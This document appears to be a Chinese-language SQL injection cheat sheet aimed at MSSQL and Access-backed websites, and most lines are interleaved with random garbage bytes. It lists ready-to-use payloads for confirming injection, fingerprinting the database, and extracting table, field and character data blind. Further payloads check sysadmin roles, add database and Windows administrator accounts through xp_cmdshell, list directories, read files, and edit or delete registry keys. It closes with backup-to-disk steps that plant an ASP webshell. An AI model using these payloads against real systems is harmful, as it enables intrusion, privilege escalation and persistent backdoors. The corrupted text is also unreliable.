1.判断是否有注入;and 1=1 ;and 1=2 76��bMy4re
2.初步判断是否是mssql ;and user>0 x�P_/5N�=f
*�Y�?oAVkz
3.注入参数是字符'and [查询条件] and ''=' /vq�$�/��
)Gavjj&uJ�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' DuN�indo�8
`m#-J;l�a�
5.判断数据库系统 Y�A@�ML�Zm
c��7~R0nP�
;and (select count(*) from sysobjects)>0 mssql cn�S;9�=,&
8\"Gs�� z
;and (select count(*) from msysobjects)>0 access Y)�DA��R83
}zks@7�kf�
Unv�'m5�/L
L2�+�cV�R�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �AT)b/y�cC
�$�|xSM��2
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 n\�)�1Bz��
�F~i �~%f,
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 4(s�HUWT��
�JO`�r�)�_
9.(1)猜字段的ascii值(access) J$s�B�fO�D
~+j2a3rv-{
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 1
_Oc1RM �
�P�WZd�<��
(2)猜字段的ascii值(mssql) q�E�uO@�oE
s;YbZ*oaMe
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 {1Y���@%e
}% ���f�7O
10.测试权限结构(mssql) ��0
zK{)HZ
q8&l%��-d`
xu_,0�ZT]{
�'�B{FR�K
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [al$sC�D]+
�A+�!��,{G
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �zBlv?�JwG
�Cdib{y<ji
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- L-}�J=n\��
$&&�E�[JY�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2�mn��AL#
�F��L�s$
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Gc"�h�U�:m
E(j#�R��"
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- -&sY�*(:n_
t��))MZw&@
;and 1=(select IS_MEMBER('db_owner'));-- �/�W)A[jR
=�qc�+sMo�
J�Ln���v O
w8>�h6x�"�
11.添加mssql和系统的帐户 �O���t�oM�
aUzC�KX%>C
;exec master.dbo.sp_addlogin username;-- �b�q9�w�@O
;exec master.dbo.sp_password null,username,password;-- u1L^INo/�
}rI�:pp^KS
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �p��09p�/�
?!�&%-R�6*
;exec master.dbo.xp_cmdshell 'net user username password ��C�&>*~�
���:u./"[G
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �GE(~d���'
3PGAUQR#"q
;exec master.dbo.xp_cmdshell 'net user username password /add';-- '�)!�X�1A{
Oo�@o$�\+v
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �^e_L�nJ�+
chKK9�SC+|
n'v\2(&uYN
-z~!%�4��a
12.(1)遍历目录 >P:X�\�5Oj
~<f[7dBv��
;create table dirs(paths varchar(100), id int) _�0v+'&bz�
Inv`C,$7Q#
;insert dirs exec master.dbo.xp_dirtree 'c:\' �?' .AeoE-
=K�18|�Q0m
;and (select top 1 paths from dirs)>0 E{&Mmr�lL,
��!CWe1Dm
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 5K ;�E�*s,
��+�Z�M,E8
�I�Gcq*mR=
q:/df]�Ntt
(2)遍历目录 s{Y4wvQy�B
����vUJ;�D
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- M/qu�swn�1
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 /7 Tm2�Vj8
Si>38v�CJ*
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 \j�tA8o�%n
NC%hsg^0/�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Z-Qp9�G'
�
^~;i�a7V&2
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 )&c#?�wx'w
h<U?WtWT-p
)pH�+i��bR
&
"&s���,
13.mssql中的存储过程 gHLI>ew*QR
a���X^�T[�
xp_regenumvalues 注册表根键, 子键 h�c3hU����
D#b�*M�)X"
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 S��l�G �v�
%hsCB
.r>|
xp_regread 根键,子键,键值名 g�[O?wH�-a
0I)$!1~O)
;exec xp_regread |nZ^RCHo�g
�p H ����y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �X ha��9x,
2K�9�1��E}
xp_regwrite 根键,子键, 值名, 值类型, 值 {*7MT�}{(�
[yXm�nrx�A
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 tk%�f_��"}
a/j;�1xcc<
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 'dwT&�v]@�
��� 2h ���
xp_regdeletevalue 根键,子键,值名 � l(��?B0
7y'":��1
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 il5�C9q�l$
�f8]��sjeY
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �&:&89<C'�
�8�}����B
gF{�eh�U�%
v|%41x�Osr
14.mssql的backup创建webshell
bmv8nal<Y
!%G�]���~
use model 7J��f~Bn�
j,M$l mR')
create table cmd(str image); *��): |WDR
Cs6`l�X� >
insert into cmd(str) values (''); z���q���eQ
j�>\c >�U�
backup database model to disk='c:\l.asp'; r<UV�O$��N
AHb_B�gOU*
V�L9w��Ru;
�{]Hi�T�pn
15.mssql内置函数 _��Op�%H)�
y&NqVR�=��
;and (select @@version)>0 获得Windows的版本号 M�~t��aZt4
�/t0L%�jJZ
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �j<t3�bM-G
�kamQZzPe
;and (select user_name())>0 爆当前系统的连接用户 ���)d2�Z g
1B~O!']�N<
;and (select db_name())>0 得到当前连接的数据库 >v:ex�(�y0
ra$:�ibL�N
PJ.\���)oP
P1eSx�#3bR
16.简洁的webshell 9F��/I",EA
u\*9\���G�
use model Qt�W9!p�7(
!�#KKJ`uB"
create table cmd(str image); ku]5sd >b�
cc[(�w
�#K
insert into cmd(str) values (''); ]�Y\$U<YjO
.�@��V�Z3"
backup database model to disk='g:\wwwtest\l.asp';
